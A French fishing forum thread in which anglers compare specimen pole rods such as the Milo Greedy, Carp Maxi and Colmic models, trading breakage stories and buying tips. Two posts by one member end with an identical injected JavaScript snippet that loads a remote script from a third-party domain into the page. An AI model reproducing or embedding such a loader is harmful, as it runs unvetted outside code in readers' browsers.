canne a specimen!

Voir le sujet précédent Voir le sujet suivant Aller en bas

canne a specimen!

Message par pepal le Sam 21 Sep - 6:03

alors voila j'ai une greedy de chez milo et une shimano perfection ou avec laquelle j'ai pu sortir une de 11kg2 ,

mais en discutant avec une personne des etang a la tour en salvigny ils ma dit que aussi bien l'une que l'autre casserai!!

donc j'ai l'intention d'investir dans une canne a specimen si possible avec 2kits et un kit coupelle ,

mais laquelle choisir je suis bien tenter par une colmic mais je sais pas ou en trouver une et laquelle prendre surtout!
pepal

inscrit depuis le : 30/01/2013

Revenir en haut Aller en bas

Re: canne a specimen!

Message par manu1970 le Sam 21 Sep - 7:24

Regarde sur le site delphi peche. Elle est en promo la proto de chez colmic
manu1970

inscrit depuis le : 06/09/2013

Message par Greg le Sam 21 Sep - 14:33

[Vous devez être inscrit et connecté pour voir ce lien]
Greg
Admin
Admin

inscrit depuis le : 08/01/2011

http://www.passion-coup.net

Message par manu81 le Sam 21 Sep - 17:48

la shimano connai pas mais par contre je pense que avant que la greedy casse de l'eau passera sous les pont elle ai une canne a specimen si vous connaissai la milo 1750 et bien la greedy et tout simplement une 1750 relookee (car le greedy et sa remplacante et  elle sont toute les deux compatible a 100 pour 100 aussi bien en therme de soliditer ,de longueur etc...)donc ultra solide certain dont loic alias rs gollum l'utilise pour le silure les première avais un souci dans le talon qui la faisai exploser au niveau du talon mais sa du etre regler et puis le talon explose sur des silure de seine avec du double 3.9 tresser et monter dasn le brin 3 et 4 avec en moyenne des bestiaux 1.50 pour une trentaine de kilo donc il y a de la marge car la loic les pousse dans leur retranchemzent aucune canne n'ai prevu pour du double 3.9 creux tendu et tresser et pourtant les milo encaisse donc perso se que je te conseillerai c avant de t'en mettre pour de l'argent vas les tester la bas directement et tu vera si elle casse comme cette personne ta dit mais peu etre cette personne et trop bourrin ou encore une sabraque enfin pour dire que les gens qui savent se qui vas se passer avec telle ou telle canne me font bien rire rien ne vaut les essai comme sa tu verra si sa tien ou pas mais bon si tes deux canne casse la bas c pas dit que une proto ne casserai pas non plus  perso je suis un gros bourrin avec mes canne car je peche les carpe sauvage en riviere avec et exclusivement avec du milo et bien je peu te dire que mes canne ne bouge pas elle sont monter en 3.95 creux tendu et sa branche pas un pet
manu81

inscrit depuis le : 28/12/2012

Message par pepal le Dim 22 Sep - 7:00

manu81 a écrit:la shimano connai pas mais par contre je pense que avant que la greedy casse de l'eau passera sous les pont elle ai une canne a specimen si vous connaissai la milo 1750 et bien la greedy et tout simplement une 1750 relookee (car le greedy et sa remplacante et  elle sont toute les deux compatible a 100 pour 100 aussi bien en therme de soliditer ,de longueur etc...)donc ultra solide certain dont loic alias rs gollum l'utilise pour le silure les première avais un souci dans le talon qui la faisai exploser au niveau du talon mais sa du etre regler et puis le talon explose sur des silure de seine avec du double 3.9 tresser et monter dasn le brin 3 et 4 avec en moyenne des bestiaux 1.50 pour une trentaine de kilo donc il y a de la marge car la loic les pousse dans leur retranchemzent aucune canne n'ai prevu pour du double 3.9 creux tendu et tresser et pourtant les milo encaisse donc perso se que je te conseillerai c avant de t'en mettre pour de l'argent vas les tester la bas directement et tu vera si elle casse comme cette personne ta dit mais peu etre cette personne et trop bourrin ou encore une sabraque enfin pour dire que les gens qui savent se qui vas se passer avec telle ou telle canne me font bien rire rien ne vaut les essai comme sa tu verra si sa tien ou pas mais bon si tes deux canne casse la bas c pas dit que une proto ne casserai pas non plus  perso je suis un gros bourrin avec mes canne car je peche les carpe sauvage en riviere avec et exclusivement avec du milo et bien je peu te dire que mes canne ne bouge pas elle sont monter en 3.95 creux tendu et sa branche pas un pet!!!

le probleme ai que milo en ce moment a des problemes !!

2 amis a moi on acheter 2 carpe maxi et les 2 en meme pas 4jours on eu des problemes !!
pour la personne qui ma dit quelle casserais je lui fait confiance c'est un tres bon pecheur aux coups et c'est ce qu'il dit!!

pepal

Message par fadacarpe90 le Dim 22 Sep - 9:44

casser des carp maxi?...........laquelle la 1ière(grise) ou la 12.01?

La 1ière,je l'ai depuis sa sortie.....même en pêchant dans des obstacles sur des silures en 45° j'ai jamais rien cassé......

La greedy,comme dis + haut c'est la remplaçante de la 1750.......que tu peux voir sur les vidéos de loïc(rs gollum sur les forums) en seine sur des silures....

Moi,chez milo,je t'aurais dis:carp maxi (1ière version) ou marginal.Sinon,dans les nouvelles "concept",y'a du solide aussi(toujours à voir avec loïc sur son blog)

Je "pense",que si ces cannes résistent à une utilisation en Seine sur de gros silures,avec des lignes en tresse......on doit pouvoir dire que c'est du solide??!!!

Sinon,chez colmic y'a dub costaud aussi à ce qu'on entend,mais je ne connais pas la gamme......les autres marques?!
fadacarpe90

inscrit depuis le : 09/09/2012

Message par manu81 le Dim 22 Sep - 15:53

fadacarpe90 a écrit:casser des carp maxi?...........laquelle la 1ière(grise) ou la 12.01?

La 1ière,je l'ai depuis sa sortie.....même en pêchant dans des obstacles sur des silures en 45° j'ai jamais rien cassé......

La greedy,comme dis + haut c'est la remplaçante de la 1750.......que tu peux voir sur les vidéos de loïc(rs gollum sur les forums) en seine sur des silures....

Moi,chez milo,je t'aurais dis:carp maxi (1ière version) ou marginal.Sinon,dans les nouvelles "concept",y'a du solide aussi(toujours à voir avec loïc sur son blog)

Je "pense",que si ces cannes résistent à une utilisation en Seine sur de gros silures,avec des lignes en tresse......on doit pouvoir dire que c'est du solide??!!!

Sinon,chez colmic y'a dub costaud aussi à ce qu'on entend,mais je ne connais pas la gamme......les autres marques?!
la 1201 possible celle la je la connai pas mais pour se qui ai de la carpe maxi grise la première avant de la casser faut i faire j'en connais qui pêche le silure avec et comme dit dans la citation en 45centieme elle tiens sans problème après on peu etre un excellent pêcheur au coup et casser des canne tout bêtement en mettant le kit trop en arrière ou pêcher le big fish avec un montage sur deux élément sa aussi sa joue fortement sur combien d’élément l'elastic ai monter la force exercer n'ai pas la meme donc casser c canne la en 4jour faut quand meme i faire apres comme dit fadacarpe90 si elle resiste a une peche de silure en seine avec des grosse tresse je voi pas comment des pecheur arrive a les casser sur des carpe c bien qu'il y a des truc qui cloche une mauvaise manip ou autre et le probleme;milo a des probleme comme toute les marque tu prend la concept carp sorti cet annee elle coute une misere et loic alias rs gollum l'utilise sur le silure et elle bronche pas du tout video a l'appuis sur le net donc bon les probleme pour moi c vite dit c surtout comment on sens sert tout le monde dit sensas c fragile je peche aussi en sensas et j'ai jamais casser sur une carpe enfin si tu a envie de changement fait toi plaisir en prenant une colmic mais si c juste parce que quelqu'un ta dit quelle casserai pour moi tu jettera de l'argent par la fenetre car la greedy et ultra solide et resistera sans souci je suis sur autant que la proto resisterai
manu81

Message par pepal le Dim 22 Sep - 18:51

la canne na pas casser mais le carbonne au niveau de chaque emmanchemnt arrache sur 4ou5cm et je pense que c'est un defaut!!Sad 
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="http://www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
pepal

Message par manu81 le Dim 22 Sep - 19:01

surement un defaut sur une certaine serie ( manque de pot les canne qu'il ont doivent faire parti de cette mauvaise serie)comme sa peu arriver sur du nylon ou hamecon mais a part se defaut la canne en elle meme la carp maxi grise c plus qu'un treuill c garantie ainsi que la greedy elle aussi c un gros treuill enfin c mon avi perso pour moi la greedy ou la carp maxi vaut bien une proto
manu81

Message par Frédy6293 le Lun 23 Sep - 7:04

Bonjour,
Je pêche avec la carp maxi, elle est lourde, épaisse mais elle en sort... J'ai même fait de la bordure avec... Je ne la lacherais pour rien au monde !!!! Dernière en date une 15.200 kgs... Ca c'est pour la carpe, mais des siluires sortent avec cette canne !!! Chacun sa marque, chacun sa canne !!!

modérateur
modérateur

inscrit depuis le : 25/01/2011

Message par pepal le Lun 23 Sep - 20:03

ok merci a vous
pepal

Message par stephane le Mar 24 Sep - 13:08

Mdr.....avec Greg nous avons le record de kit explose sur la carpmax.....environs 7 a nous deux.....on est trop fort.....sinon c est une super canne a spécimen et pas chère...pour info les kits n ont jamais été casse en action de pêche .....
stephane
membre du staff
membre du staff

inscrit depuis le : 17/08/2011

Message par papy76 le Mar 24 Sep - 14:17

ben alors Shocked vous les avez cassé comment Question Question confused
papy76

inscrit depuis le : 04/02/2013

Message par Frédy6293 le Mar 24 Sep - 15:23

Avec l'aide des arbres et autres stations voir les pieds !!!!    

Les deux ensemble c'est des dingues à la pêche... affraid  affraid  affraid  

Aucune crainte avec la carp maxi.... 1  1  1

modérateur
modérateur

inscrit depuis le : 25/01/2011

Message par papy76 le Mar 24 Sep - 19:25

comme dirait ma mére "mon dieu quelle horreur affraid  affraid   
papy76

Message par stephane le Mer 25 Sep - 17:00

Pas de ma faute si mon kit décide de s enrouler autour d une branche lors d une casse sur une vache.....mdr...
stephane
membre du staff
membre du staff

inscrit depuis le : 17/08/2011

Message par papy76 le Mer 25 Sep - 21:10

ben voyons , 
papy76

Message par manu81 le Mer 25 Sep - 21:47

bon alors je revien sur le post afin de ovus tenir au courant de la greedy elle ai donc pas faite pour la peche du silure le talon casse toujour je tiens c info de loic (rs gollum) donc a ne pas utiliser sur la peche extreme du silure par contre pour les autre peche aucun souci je pense
manu81

Message par manu81 le Mer 25 Sep - 21:57

sinon tu as aussi la milo concept carp qui coute une misere et qui ai tres tres solide loic l'utilise sur le silure et elle encaisse sans broncher
manu81

Message par pepal le Jeu 26 Sep - 3:31

manu81 a écrit:bon alors je revien sur le post afin de ovus tenir au courant de la greedy elle ai donc pas faite pour la peche du silure le talon casse toujour je tiens c info de loic (rs gollum) donc a ne pas utiliser sur la peche extreme du silure par contre pour les autre peche aucun souci je pense
tout a fait ila vient de l' mettre kom koi elle ai pas fait pour il y a a peine 5heure de ca!! sur fb:n : 
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="http://www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
pepal

Message par manu81 le Jeu 26 Sep - 7:08

exact ou moins on sais tout se qu'il y a a savoir sur elle maintenant aller suivante
manu81

Message par pepal le Dim 29 Sep - 6:29

exacte apres j'aurais bien aimer avoir une colmic
pepal

Message par ColmicScXt le Dim 6 Oct - 9:42

Perso j'ai vue casser la Carp maxi (modèle gris) a la tour.

Une mini marginal de milo en 5m a été plier , j'y ai eu Audi le droit avec ma super carpa xt exploser au niveau de 5 brins et pourtant cela fait 3 ans que je pêche le spécimens a la canne. 

La greddy peut tenir, tout dépend le poste choisit ! La bas c'est minimum 30centiemes a par si tu veux faire des pins de 6-7kg

Les poissons de la tour on une défense hors normes (a par quelques période) des amis qui sont venues tester ont tout simplement halluciner (8 casses en 35)
ColmicScXt

inscrit depuis le : 01/01/2013

Message par pepal le Lun 7 Oct - 6:56

ColmicScXt a écrit:Perso j'ai vue casser la Carp maxi (modèle gris) a la tour.

Une mini marginal de milo en 5m a été plier , j'y ai eu Audi le droit avec ma super carpa xt exploser au niveau de 5 brins et pourtant cela fait 3 ans que je pêche le spécimens a la canne. 

La greddy peut tenir, tout dépend le poste choisit ! La bas c'est minimum 30centiemes a par si tu veux faire des pins de 6-7kg

Les poissons de la tour on une défense hors normes (a par quelques période) des amis qui sont venues tester ont tout simplement halluciner (8 casses en 35)
justement jerome j'aimerais m'acheter une colmic mais ou la trouver et laquelle prendre si tu a encore mon numero envoi un sms  pour me dire stp
pepal

Message par Contenu sponsorisé

Contenu sponsorisé

Voir le sujet précédent Voir le sujet suivant Revenir en haut